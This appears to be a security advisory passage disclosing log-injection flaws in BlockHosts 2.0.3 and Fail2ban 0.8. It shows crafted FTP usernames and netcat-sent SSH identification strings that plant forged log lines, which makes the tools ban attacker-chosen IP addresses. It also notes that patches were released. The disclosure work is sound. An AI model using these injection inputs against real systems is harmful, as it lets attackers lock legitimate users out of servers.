Vulnerable programs
We used DenyHosts on our previous example, because it is one of the most famous tools out there, but it is not the only one vulnerable.


BlockHosts latest version (2.0.3) is also vulnerable to log injection via the vsftp and SSH logs. The reason is the same as DenyHosts: loose regular expressions.

root@slacker:~# ftp 192.168.3.4
220 Welcome to labs ossec candy FTP service.
Name (192.168.2.3:root): lala] FAIL LOGIN: Client “2.3.4.54″
..

(looking at the logs)
Mon Jun 2 21:06:02 2007 [pid 1452] [lala] FAIL LOGIN: Client “2.3.4.54″ ] FAIL LOGIN: Client “192.168.3.1″

If we pass a modified user name in order to inject an IP address, it will block
the fake supplied IP address instead of the valid one.
root@slacker:~# cat /etc/hosts.deny
#—- BlockHosts Additions
ALL: 2.3.4.54 : deny
..
#—- BlockHosts Additions

With the SSH logs, the issue is the same as with DenyHosts. If we inject any data in the protocol identification field, BlockHosts will parse our fake ip addresses instead of the valid one (the exploit for DenyHosts will work with BlockHosts with just a slight change — as a reader exercise).
dcid@enigma:~$ nc 192.168.5.1 22
SSH-1.99-OpenSSH_3.9p1
sshd[123]: User myself from 1.5.6.7 not allowed

Protocol mismatch.

(the logs):
Jun 4 14:49:46 slacker sshd[4153]: Bad protocol version identification ‘sshd[123]: User myself from 1.5.6.7 not allowed ‘ from 10.1.1.14

root@slacker:~# cat /etc/hosts.deny
#—- BlockHosts Additions
ALL: 1.5.6.7 : deny
..
#—- BlockHosts Additions

*BlockHosts author, Avinash Chopde, has released a patch for it.


Fail2ban latest version 0.8 is vulnerable to the same injection via SSH logs that DenyHosts and BlockHosts are. It looks for “ROOT LOGIN REFUSED” anywhere in the logs and as previously shown, we can easily inject that using the bad protocol identification message from ssh.
dcid@enigma:~$ nc 192.168.5.1 22
SSH-1.99-OpenSSH_3.9p1
ROOT LOGIN REFUSED hi FROM 1.5.6.7
Protocol mismatch.

(the logs):
Jun 4 14:49:46 slacker sshd[4153]: Bad protocol version identification ‘ROOT LOGIN REFUSED hi FROM 1.5.6.7 ‘ from 10.1.1.14

*Fail2ban author, Cyril Jaquier, has released a patch for it.

**This issue is similar to CVE-2006-6302, but using a different vector. Thanks to Cyril Jaquier for pointing it out to me.